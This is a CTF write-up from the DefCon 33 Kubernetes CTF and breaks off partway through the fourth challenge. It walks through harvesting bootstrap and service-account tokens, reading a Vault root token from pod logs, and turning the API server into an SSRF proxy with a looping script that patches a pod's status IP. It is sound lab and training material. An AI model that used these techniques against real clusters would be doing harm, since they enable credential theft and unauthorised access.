DefCon 33 Kubernetes CTF Writeup
Introduction
I had the pleasure of taking part in the Kubernetes CTF at DefCon again. This is a CTF led by Jay Beale from InGuardians. They usually have some fun theming and concepts; I particularly remember the Scott Pilgrim CTF from a year or two ago. One thing I did note this year is that there are more challenge authors now, so hopefully an even bigger variety.
Challenge 1 - diomhaireachdan by Raesene (Rory McCune)
This challenge's description was:
Can you find my secret?
You will not need to start or enter any pods/containers in the cluster.
Sounds like we need to find a secret. Let’s get started with a trusty auth can-i --list
$ k auth can-i --list
Resources Non-Resource URLs Resource Names Verbs
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[/.well-known/openid-configuration/] [] [get]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks/] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
secrets [] [] [list]
Nice, we can list secrets. Let’s see what we have.
$ k get secrets
NAME TYPE DATA AGE
bootstrap-token-4g1ozq bootstrap.kubernetes.io/token 5 9s
bootstrap-token-710mks bootstrap.kubernetes.io/token 5 9s
bootstrap-token-74j090 bootstrap.kubernetes.io/token 5 9s
bootstrap-token-ay2z85 bootstrap.kubernetes.io/token 7 39s
bootstrap-token-dugrj2 bootstrap.kubernetes.io/token 5 9s
bootstrap-token-i7aolq bootstrap.kubernetes.io/token 5 9s
bootstrap-token-omvv5g bootstrap.kubernetes.io/token 6 49s
bootstrap-token-u25be1 bootstrap.kubernetes.io/token 5 9s
Oh, that’s quite a few bootstrap tokens…
$ k get secrets -o yaml
apiVersion: v1
items:
- apiVersion: v1
data:
auth-extra-groups: c3lzdGVtOmJvb3RzdHJhcHBlcnM6Y2xvdWRzZWM=
token-id: NGcxb3px
token-secret: d2lqeWk4YXNvY3QwdnJjMg==
usage-bootstrap-authentication: dHJ1ZQ==
usage-bootstrap-signing: dHJ1ZQ==
kind: Secret
metadata:
creationTimestamp: "2025-08-10T00:05:50Z"
name: bootstrap-token-4g1ozq
namespace: kube-system
resourceVersion: "780"
uid: 2bc8c152-a769-48a2-97c2-0b9bf7945060
type: bootstrap.kubernetes.io/token
- apiVersion: v1
data:
auth-extra-groups: c3lzdGVtOmJvb3RzdHJhcHBlcnM6ZGVmY29uLWhhY2tlcnM=
token-id: NzEwbWtz
token-secret: emdudmZ5c2ZkYWJvdGdkdA==
usage-bootstrap-authentication: dHJ1ZQ==
usage-bootstrap-signing: dHJ1ZQ==
kind: Secret
metadata:
creationTimestamp: "2025-08-10T00:05:50Z"
name: bootstrap-token-710mks
namespace: kube-system
resourceVersion: "776"
uid: e8e6e414-2cd6-4fc0-abe4-3e141c7cc3d8
type: bootstrap.kubernetes.io/token
[..SNIP..]
They look a bit different too… A bootstrap token is just token-id.token-secret, with both parts stored base64-encoded in the Secret, so let's extract the token for each of these and then enumerate each one's permissions.
$ k get secrets -o json | jq '.items[].data | (."token-id" | @base64d) + "." + (."token-secret" | @base64d)' -r
4g1ozq.wijyi8asoct0vrc2
710mks.zgnvfysfdabotgdt
74j090.ihfqwo0krekgpi1b
ay2z85.ccvy7tk2y3qvxban
dugrj2.bxw8qnbjytp5eqgk
i7aolq.iemcxa1wqegv42vv
omvv5g.pz5fuvthz8ard377
u25be1.2gafybtxpqe7gci7
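To drop them straight into a file, the same jq pipeline can simply be redirected:
$ k get secrets -o json | jq '.items[].data | (."token-id" | @base64d) + "." + (."token-secret" | @base64d)' -r > /tmp/tokens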
With those saved as /tmp/tokens, we can now enumerate each of those.
$ cat /tmp/tokens | while read token; do echo $token; k --token $token auth can-i --list; done
4g1ozq.wijyi8asoct0vrc2
Resources Non-Resource URLs Resource Names Verbs
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
710mks.zgnvfysfdabotgdt
Resources Non-Resource URLs Resource Names Verbs
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
74j090.ihfqwo0krekgpi1b
Resources Non-Resource URLs Resource Names Verbs
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
ay2z85.ccvy7tk2y3qvxban
Resources Non-Resource URLs Resource Names Verbs
certificatesigningrequests.certificates.k8s.io [] [] [create get list watch]
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
certificatesigningrequests.certificates.k8s.io/nodeclient [] [] [create]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
configmaps [] [kube-proxy] [get]
configmaps [] [kubeadm-config] [get]
configmaps [] [kubelet-config] [get]
nodes [] [] [get]
dugrj2.bxw8qnbjytp5eqgk
Resources Non-Resource URLs Resource Names Verbs
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
i7aolq.iemcxa1wqegv42vv
Resources Non-Resource URLs Resource Names Verbs
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
configmaps [] [] [list]
namespaces [] [] [list]
omvv5g.pz5fuvthz8ard377
Resources Non-Resource URLs Resource Names Verbs
certificatesigningrequests.certificates.k8s.io [] [] [create get list watch]
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
certificatesigningrequests.certificates.k8s.io/nodeclient [] [] [create]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
configmaps [] [kube-proxy] [get]
configmaps [] [kubeadm-config] [get]
configmaps [] [kubelet-config] [get]
nodes [] [] [get]
u25be1.2gafybtxpqe7gci7
Resources Non-Resource URLs Resource Names Verbs
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
Skimming the list, token i7aolq.iemcxa1wqegv42vv has slightly different permissions than the others: it has configmap and namespace access. Let's see what it has; typically bootstrap tokens have cluster-wide access, hence the -A here.
$ k --token i7aolq.iemcxa1wqegv42vv get -A cm
NAMESPACE NAME DATA AGE
data extra-access 1 5m56s
data kube-root-ca.crt 1 5m56s
default kube-root-ca.crt 1 6m1s
default script-runner 1 5m56s
kube-node-lease kube-root-ca.crt 1 6m1s
kube-public cluster-info 9 6m6s
kube-public kube-root-ca.crt 1 6m1s
kube-system calico-config 4 5m55s
kube-system coredns 1 6m5s
kube-system extension-apiserver-authentication 6 6m10s
kube-system kube-apiserver-legacy-service-account-token-tracking 1 6m10s
kube-system kube-proxy 2 6m5s
kube-system kube-root-ca.crt 1 6m1s
kube-system kubeadm-config 1 6m6s
kube-system kubelet-config 1 6m6s
That extra-access ConfigMap in the data namespace looks interesting. Unfortunately we can't get it specifically, but we have list, so we can retrieve everything in the namespace.
$ k --token i7aolq.iemcxa1wqegv42vv -n data get cm -o yaml
apiVersion: v1
items:
- apiVersion: v1
data:
flag: '{flag-raesenes-ramblings}'
kind: ConfigMap
metadata:
creationTimestamp: "2025-08-10T00:05:20Z"
name: extra-access
namespace: data
resourceVersion: "391"
uid: fe9a8810-ec5c-4bbc-9e38-68a50bf73291
- apiVersion: v1
data:
ca.crt: |
-----BEGIN CERTIFICATE-----
MIIC6jCCAdKgAwIBAgIBADANBgkqhkiG9w0BAQsFADAVMRMwEQYDVQQDEwprdWJl
cm5ldGVzMB4XDTI1MDgwOTIzNTk1MFoXDTM1MDgwODAwMDQ1MFowFTETMBEGA1UE
AxMKa3ViZXJuZXRlczCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBANTg
sypCsC6ODsKXpe1IB/SQn9NSFlj0UW+bp6h/t4A9qHZi13TPJgz1D1RZgD72tAnq
vDNb1TTtKOgOwVJl+TxUIueMok8Pin4cK+o5JC4Ud854iA2392wjUQydwM8hpMIy
kSkIr/pbsgO/DWKeiqt7RF5LKhWziHKZmfc5Xe59KamFtJbvtolz3Pf2Q1qWxgEx
ZvOQ4unKdFyq/Cr0Kr3CfaFUhKgIvk+BAFzfZwoEOf90QwVRHPA9FWXUylygLxh0
ZqqaBMWPk7q8eGKbIIetdiPRbWbFjm0fk8J0eulAu/ikXcfyPUxvL4jMMsflkOe1
p2YykOGnCcF6UaPX5rECAwEAAaNFMEMwDgYDVR0PAQH/BAQDAgKkMBIGA1UdEwEB
/wQIMAYBAf8CAQAwHQYDVR0OBBYEFMX6eycMn9yNfZTM8dYAIiNYd3YcMA0GCSqG
SIb3DQEBCwUAA4IBAQBOKDIgromziDL0CShyrpy62DSX3UH6/F6MNG+bm8tRRCFg
nFW/zKeFJ3Mnn5xd9Ed4+5z5c/AzdNR2XW69VSjJYZCdNNR9MYP0nhM8oEIktQLL
PCIZHh27+sQqS/nFtldH1e+nC1Wl6m5RHyKcni6nVfvjtgMNjKWyExNH/VRi/4z8
ojT8FeaU+fJVFj9+JtFBL5ug2SK0I5353LYyXWYhGiYdRwZ2wkvs9YMX18F5rSTK
vdYfvNwgIsHPUFuUHi8U8a9YkJPSKKLcoURm4GF/WtgZF0flLEIx4X3fqs2wpYET
KqzkHD8GSLrmexzgD0cAoGzHgZxYgojbkLmXv72l
-----END CERTIFICATE-----
kind: ConfigMap
metadata:
annotations:
kubernetes.io/description: Contains a CA bundle that can be used to verify the
kube-apiserver when using internal endpoints such as the internal service
IP or kubernetes.default.svc. No other usage is guaranteed across distributions
of Kubernetes clusters.
creationTimestamp: "2025-08-10T00:05:20Z"
name: kube-root-ca.crt
namespace: data
resourceVersion: "390"
uid: 4c826624-3597-48fa-9fe9-5ed555f1512a
kind: List
metadata:
resourceVersion: ""
Nice, that’s flag 1.
Challenge 2 - looking-under-rock by Rob CurtinSeufert
This challenge has the description:
Is there a better place to store secrets, then under a rock?
Once again, let’s start with permissions.
$ k auth can-i --list
Resources Non-Resource URLs Resource Names Verbs
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[/.well-known/openid-configuration/] [] [get]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks/] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
namespaces [] [] [list get]
pods [] [] [list get]
Nice, we can see namespaces. Let’s see what is there.
$ k get ns
NAME STATUS AGE
default Active 113s
kube-node-lease Active 113s
kube-public Active 113s
kube-system Active 113s
vault Active 100s
velero Active 100s
OK, so Vault is a secrets manager - that's probably where the flag is, based on the description. Velero is for backups. Let's start digging into these.
$ k get -A pods
NAMESPACE NAME READY STATUS RESTARTS AGE
default script-runner 0/1 Completed 0 107s
kube-system calico-kube-controllers-576865d959-7ng9w 1/1 Running 0 107s
kube-system calico-node-45bgx 1/1 Running 0 107s
kube-system calico-node-hvmvh 1/1 Running 0 103s
kube-system coredns-668d6bf9bc-jwqf6 1/1 Running 0 113s
kube-system coredns-668d6bf9bc-xqvlz 1/1 Running 0 113s
kube-system etcd-ctfd-35-8wrvq-5m5f4 1/1 Running 0 116s
kube-system kube-apiserver-ctfd-35-8wrvq-5m5f4 1/1 Running 0 119s
kube-system kube-controller-manager-ctfd-35-8wrvq-5m5f4 1/1 Running 0 116s
kube-system kube-proxy-24jww 1/1 Running 0 103s
kube-system kube-proxy-48z6l 1/1 Running 0 113s
kube-system kube-scheduler-ctfd-35-8wrvq-5m5f4 1/1 Running 0 117s
vault vault 1/1 Running 0 107s
velero backup 1/1 Running 0 107s
Checking the vault pod doesn't return much. However, velero does seem to have some fun stuff within.
$ k -n velero get pods -o yaml
apiVersion: v1
items:
- apiVersion: v1
kind: Pod
metadata:
annotations:
backup: eyJhbGciOiJSUzI1NiI[..SNIP..]
cni.projectcalico.org/containerID: 69d67ae6fc86282948dbb91f41dbc47a282b859e0813541d2d47a327a3e715ed
cni.projectcalico.org/podIP: 192.168.183.194/32
cni.projectcalico.org/podIPs: 192.168.183.194/32
creationTimestamp: "2025-08-10T00:13:42Z"
name: backup
namespace: velero
resourceVersion: "786"
uid: cce06bda-7cc6-4cc8-b8fe-13d03511bbaa
[..SNIP..]
Nice, a service account token is within its annotations.
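As an aside, jsonpath can pull that annotation out directly rather than copy-pasting it from the YAML dump (the annotation key is backup, as seen above):
$ k -n velero get pod backup -o jsonpath='{.metadata.annotations.backup}'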
$ export TOKEN=eyJhbGciOiJSUzI1NiIsImtpZCI6Imc3aEpWTURfOHB[..SNIP..]
$ alias k="kubectl --token $TOKEN"
$ k auth whoami
ATTRIBUTE VALUE
Username system:serviceaccount:vault:backup
UID e9db1f98-6317-4372-bc3f-e707000e2228
Groups [system:serviceaccounts system:serviceaccounts:vault system:authenticated]
Extra: authentication.kubernetes.io/credential-id [JTI=63aefdf3-1f25-453f-87f0-c0ec730cc1cf]
Nice, so this service account is from the vault namespace. OK, let's see what it can do in the vault namespace.
$ k auth can-i --list -n vault
Resources Non-Resource URLs Resource Names Verbs
pods/exec [] [] [create]
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[/.well-known/openid-configuration/] [] [get]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks/] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
pods/log [] [] [list watch get]
pods [] [] [list watch get]
OK, so this can execute into pods and view logs. From experience running Vault, I know that in dev mode it outputs the root authentication token to its logs. So let's check that first.
$ k -n vault logs vault
==> Vault server configuration:
[..SNIP..]
You may need to set the following environment variables:
$ export VAULT_ADDR='http://127.0.0.1:8200'
The unseal key and root token are displayed below in case you want to
seal/unseal the Vault or re-authenticate.
Unseal Key: O20AajFZ+PBGlFUpTenz6cgzIfttOOi0AR8SMEsIoT4=
Root Token: hvs.Pax01SFyuoFuuDu9gGkkSTms
Development mode should NOT be used in production installations!
Woo, root token. Now, let's exec in and use it to see what's in Vault.
$ k -n vault exec -ti vault -- sh
/ # export VAULT_ADDR='http://127.0.0.1:8200'
/ # vault login
Token (will be hidden):
Success! You are now authenticated. The token information displayed below
is already stored in the token helper. You do NOT need to run "vault login"
again. Future Vault requests will automatically use this token.
Key Value
--- -----
token hvs.Pax01SFyuoFuuDu9gGkkSTms
token_accessor U4MTDgltXBTgEWPofcAcR6EQ
token_duration ∞
token_renewable false
token_policies ["root"]
identity_policies []
policies ["root"]
That is us logged in. Let’s find that secret.
/ # vault secrets list
Path Type Accessor Description
---- ---- -------- -----------
cubbyhole/ cubbyhole cubbyhole_7b9ed5af per-token private secret storage
identity/ identity identity_16bd7e69 identity store
secret/ kv kv_9d3a8f22 key/value secret storage
sys/ system system_87e48811 system endpoints used for control, policy and debugging
/ # vault kv list secret/
Keys
----
flag
/ # vault kv get secret/flag
== Secret Path ==
secret/data/flag
======= Metadata =======
Key Value
--- -----
created_time 2025-08-10T00:14:38.666913358Z
custom_metadata <nil>
deletion_time n/a
destroyed false
version 1
==== Data ====
Key Value
--- -----
flag {flag-iamaninja-fromthehiddenleaf}
Excellent. That’s the second flag. Onwards.
Challenge 3 - hillwalker by Raesene (Rory McCune)
The description for this challenge was:
You will not be exec'ing into any pods. See what rights you have in the `hillwalker` namespace. This IP addess might be important later: 5.78.138.141
It should be noted that the last sentence with the IP address was not there from the start. I’ll get to that later.
Starting where we always do.
$ k auth can-i --list
Resources Non-Resource URLs Resource Names Verbs
pods/status [] [] [*]
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
pods/proxy [] [] [get create]
pods [] [] [get list]
[/.well-known/openid-configuration/] [] [get]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks/] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
OK, so we have pods/proxy and pods/status. There are some fun things you can do with those permissions, namely using the API server as an effective SSRF proxy. I won't go into too much detail here; Raesene has a good blog post about it.
Let's see what pod we have to take over.
$ k get pods
NAME READY STATUS RESTARTS AGE
webserver 1/1 Running 0 50s
Let's also grab the script from Raesene's blog post and convert it for our use case. Namely, this involves changing the pod name and namespace within the curl commands. The final script looks like:
#!/bin/bash
set -euo pipefail

readonly PORT=8001
readonly POD=webserver
readonly TARGETIP=x.x.x.x

while true; do
  curl -v -H 'Content-Type: application/json' \
    "http://localhost:${PORT}/api/v1/namespaces/hillwalker/pods/${POD}/status" >"${POD}-orig.json"

  cat "${POD}-orig.json" |
    sed 's/"podIP": ".*",/"podIP": "'${TARGETIP}'",/g' \
      >"${POD}-patched.json"

  curl -v -H 'Content-Type:application/merge-patch+json' \
    -X PATCH -d "@${POD}-patched.json" \
    "http://localhost:${PORT}/api/v1/namespaces/hillwalker/pods/${POD}/status"

  rm -f "${POD}-orig.json" "${POD}-patched.json"
done
Next, we set up kubectl proxy so that the curl commands can hit the API server on localhost:8001, and now we can start sending SSRF requests. The request to do that looks like curl http://127.0.0.1:8001/api/v1/namespaces/hillwalker/pods/http:webserver:80/proxy/.
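Putting the pieces together, the rough workflow is: run the proxy in one terminal, keep the status-patching loop from above running in another (I'm calling it patch-status.sh here, but the name is arbitrary), and then hit the proxy subresource:
$ kubectl proxy --port 8001 &
$ ./patch-status.sh &
$ curl http://127.0.0.1:8001/api/v1/namespaces/hillwalker/pods/http:webserver:80/proxy/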
At this point, I spent a while trying different IPs, trying to figure out what I was meant to perform a GET request against. Eventually, after talking to the organisers, they realised they had missed the IP in the description (hence the later addition of the IP). With the IP obtained, we can query it and get the flag.
$ curl http://127.0.0.1:8001/api/v1/namespaces/hillwalker/pods/http:webserver:80/proxy/
{flag-proxy-ftw-check-out-raesene-amicontained}
Challenge 4 - shell-in-the-ghost by antitree
Onwards.
Exec into the `entry-pod` pod in the `shell-in-the-ghost` namespace to start.
I assume everyone knows what the first command is.
$ k auth can-i --list
Resources Non-Resource URLs Resource Names Verbs
pods/exec [] [] [create]
pods/portforward [] [] [create]
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
pods [] [] [get list]
[/.well-known/openid-configuration/] [] [get]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks/] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
Alright, let's jump into the entry-pod. Nothing too special in the permissions aside from port forwarding, which I'm sure we will figure out the use of later.
$ k get pods
NAME READY STATUS RESTARTS AGE
entry-pod 1/1 Running 0 38s
$ k exec -it entry-pod -- bash
root@entry-pod:/#
Next, let's enumerate the container, first installing various tools such as procps, iproute2, and net-tools.
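On the Debian-based nginx image (which this appears to be), installing those is just an apt-get away, assuming the pod has outbound access to the package mirrors:
root@entry-pod:/# apt-get update && apt-get install -y procps iproute2 net-tools
With those in place, let's look at what's running.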
root@entry-pod:~# ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 11468 7552 ? Ss 00:23 0:00 nginx: master process nginx -g daemon off;
nginx 36 0.0 0.0 11936 3056 ? S 00:23 0:00 nginx: worker process
nginx 37 0.0 0.0 11936 3056 ? S 00:23 0:00 nginx: worker process
nginx 38 0.0 0.0 11936 3060 ? S 00:23 0:00 nginx: worker process
nginx 39 0.0 0.0 11936 3060 ? S 00:23 0:00 nginx: worker process
nginx 40 0.0 0.0 11936 3060 ? S 00:23 0:00 nginx: worker process
nginx 41 0.0 0.0 11936 3060 ? S 00:23 0:00 nginx: worker process
nginx 42 0.0 0.0 11936 3060 ? S 00:23 0:00 nginx: worker process
nginx 43 0.0 0.0 11936 3060 ? S 00:23 0:00 nginx: worker process
nginx 44 0.0 0.0 11936 3060 ? S 00:23 0:00 nginx: worker process
nginx 45 0.0 0.0 11936 3060 ? S 00:23 0:00 nginx: worker process
nginx 46 0.0 0.0 11936 3060 ? S 00:23 0:00 nginx: worker process
nginx 47 0.0 0.0 11936 3060 ? S 00:23 0:00 nginx: worker process
nginx 48 0.0 0.0 11936 3060 ? S 00:23 0:00 nginx: worker process
nginx 49 0.0 0.0 11936 3060 ? S 00:23 0:00 nginx: worker process
nginx 50 0.0 0.0 11936 3060 ? S 00:23 0:00 nginx: worker process
nginx 51 0.0 0.0 11936 3060 ? S 00:23 0:00 nginx: worker process
root 52 0.0 0.0 4192 3328 pts/0 Ss 00:23 0:00 bash
root 248 0.0 0.0 8104 4224 pts/0 R+ 00:24 0:00 ps aux
OK, looks like there is an Nginx process. Let’s quickly check if it’s serving anything.
root@entry-pod:/etc/nginx/conf.d# cat default.conf
server {
listen 80;
listen [::]:80;
server_name localhost;
#access_log /var/log/nginx/host.access.log main;
location / {
root /usr/share/nginx/html;
index index.html index.htm;
}
[..SNIP..]
root@entry-pod:/usr/share/nginx/html# ls -alp
total 12636
drwxr-xr-x 1 root root 4096 Jul 22 15:18 ./
drwxr-xr-x 1 root root 4096 Jul 22 01:13 ../
-rw-r--r-- 1 root root 497 Jun 24 17:22 50x.html
-rw-rw-r-- 1 root root 66 Jul 22 15:00 index.html
-rw-rw-r-- 1 root root 12922817 Jul 22 15:00 shell-in-the-ghost.tar.gz
OK, there is a shell-in-the-ghost.tar.gz file. That is probably relevant. Let's fetch it over a port-forward.
$ k port-forward pod/entry-pod 8080:80
Forwarding from 127.0.0.1:8080 -> 80
Forwarding from [::1]:8080 -> 80
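Alternatively, if a browser is inconvenient, curl against the forwarded port works just as well, since the tarball sits in the web root per the nginx config above:
$ curl -o shell-in-the-ghost.tar.gz http://127.0.0.1:8080/shell-in-the-ghost.tar.gz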
After downloading the file, we can extract it.
$ x shell-in-the-ghost.tar.gz
blobs/
blobs/sha256/
blobs/sha256/1ef464d59b39bbb9e098db47994e8e8b2fb8157bf8229f925f43533ae2aa8984
blobs/sha256/42ec1fd1e0e9cf7c66eeafd4af20102a74bd604f394e4436ab4362e55a067c9b
blobs/sha256/5376b25e3f75a3421b07ea7ce71b6fc3175a6291efe6ee503b30deb3858dee92
blobs/sha256/59a0df766dc22d514f5c5078bad37f4faa2ea33970b360dc7ed5f495103c54fc
blobs/sha256/5db8e41a8498638fbc3bf763abb7983cccaf980d9657e0db957ed0eace3989a8
blobs/sha256/601ba503a6dbaf012992587a01dfdd39b13e7c0887e9d0f3ec4ddc6847939056
blobs/sha256/65add838b59ff8eea90e22069f2509468eb28de81336faaf87a7bf6616543f8f
blobs/sha256/6c3770d4479810e0c121b23f00473facabdb223ebc911562c2d5208625d94e01
blobs/sha256/760b2d2a3e4316725ca6053138012395007fc5878c8fe2e72cedb4ed3f5c3e19
blobs/sha256/88302c9a41e733f7831e7021452a4af6e10cb20261b62d0f94d01b534144a306
blobs/sha256/8a04e1e4e352a5143946c723aad4504b588f1b39e41901fdc552423ac8b48924
blobs/sha256/8f2cd3c7d6304f9a8ca41a48b5eeb27fc9cf4e5edaba5c8ec06998c045994f00
blobs/sha256/92510d4152ebb5b036a6da0f50ce0bd4e2151097c964190ccb8bf599bdd4b317
blobs/sha256/99e29511b54555986db28630e40ef2420d4fb66ffcf1335dd6d6b958070b99f7
blobs/sha256/c4563828e88b8b72b3bd50b2d003e692179a59e236942272ed8146b896af5fb5
blobs/sha256/d0d76947a71ac5bfc7014cdc218e4585ef6dd38d55e3588f0d216ad4995097e3
blobs/sha256/d2465102e980303d11a5e2de47e2e26e93d5fec4a2ae0c52f6b3dcaae9a6b3a5
blobs/sha256/e020a1a182f2ce3e5dceaef2e289252d90182183c0da7429c168da076fce2b1d
blobs/sha256/e87db9805fd4530ac25ce61d892cd44fce1d5a593e7ff11c94cdf1288b5882bd
blobs/sha256/e9f96e6e28efc8a2eca17fedab984eab7d024ffdad3aa77c868df575ca112675
blobs/sha256/eb8f5cc21405068b9b719d5b886d66d5215a7225bd6645ae8a749926320d676e
blobs/sha256/f01e729dc70063324a0287a046d98605685aec78421c0b98f6ad231b3d05bd17
index.json
manifest.json
oci-layout
repositories
shell-in-the-ghost.tar.gz: extracted to `shell-in-the-ghost' (multiple files in root)
Oh, this looks to be a docker image. OK, let’s load it into docker as well so we can investigate it a bit.
$ docker load -i shell-in-the-ghost.tar.gz
Loaded image: antitree/shell-in-the-ghost:latest
$ docker history --no-trunc antitree/shell-in-the-ghost:latest
IMAGE CREATED CREATED BY SIZE COMMENT
sha256:d2465102e980303d11a5e2de47e2e26e93d5fec4a2ae0c52f6b3dcaae9a6b3a5 5 weeks ago RUN /bin/sh -c echo "Nothing to see here. Everything's clean." > /README.md # buildkit 41B buildkit.dockerfile.v0
<missing> 5 weeks ago COPY falseflag3.txt /.wh.hidden.txt # buildkit 57B buildkit.dockerfile.v0
